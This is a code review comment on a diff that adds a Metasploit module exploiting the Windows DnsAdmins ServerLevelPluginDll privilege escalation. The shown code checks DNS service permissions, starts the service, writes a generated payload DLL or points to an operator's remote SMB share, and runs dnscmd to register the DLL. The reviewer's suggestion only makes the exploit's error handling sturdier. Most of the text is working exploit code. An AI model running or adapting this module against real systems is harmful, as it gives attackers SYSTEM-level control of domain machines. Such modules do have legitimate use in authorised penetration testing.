modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb

```diff
@@ -0,0 +1,193 @@
+      dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item.include? dnsadmin_sid }[0]
+      if dnsadmin_dacl.include? "RPWP"
+        print_good("Members of the DnsAdmins group can start/stop the DNS service.")
+      end
+    elsif dacl_items.any? { |dacl_item| dacl_item.include? user_sid }
+      user_dacl = dacl_items.select { |dacl_item| dacl_item.include? user_sid }[0]
+      if user_dacl.include? "RPWP"
+        print_good("User #{username} can start/stop the DNS service.")
+      end
+    else
+      print_bad("User #{username} does not have permissions to start/stop the DNS service!")
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, "Session is already elevated!")
+    end
+
+    if sysinfo['Architecture'] != payload_instance.arch.first
+      fail_with(Failure::BadConfig, "Wrong payload architecture!")
+    end
+
+    unless [CheckCode::Vulnerable].include? check
+      fail_with(Failure::NotVulnerable, "Target is most likely not vulnerable!")
+    end
+
+    # if the DNS service is not started, it will throw RPC_S_SERVER_UNAVAILABLE when trying to set ServerLevelPluginDll
+    print_status("Checking service state...")
+    svc_state = service_status("DNS")
+    if svc_state[:state] == 4
+      print_status("DNS service is running, proceeding...")
+    else
+      print_status("DNS service is stopped, starting it...")
+      service_start("DNS")
+    end
+
+    # the if block assumes several things:
+    # 1. operator has set up their own SMB share (SMB2 is default for most targets)
+    # 2. operator has generated their own DLL with the correct payload and architecture
+    # 3. operator's SMB share is accessible from the target. "Enable insecure guest logons" is "Enabled" on the target or
+    #    the target falls back to SMB1
+    dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
+    if datastore['DLLPATH'].start_with?("\\\\")
+      # check if "Enable insecure guest logons" is enabled on the target system
+      allow_insecure_guest_auth = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters", "AllowInsecureGuestAuth")
+      if allow_insecure_guest_auth == 1
+        fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
+      end
+
+      print_status("Using user-provided UNC path.")
+    else
+      print_status("Creating the payload DLL (#{sysinfo['Architecture']})...")
+      opts = {}
+      opts[:arch] = [sysinfo['Architecture']]
+      dll = generate_payload_dll(opts)
+
+      print_status("Writing DLL to #{dllpath}...")
+      write_file(dllpath, dll)
+    end
+
+    print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...")
+    dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").strip
```

Comment:
`cmd_exec` can return `nil`, which results in vague errors when dealing with `dnscmd_result` laster on.

```suggestion
    dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").to_s.strip
```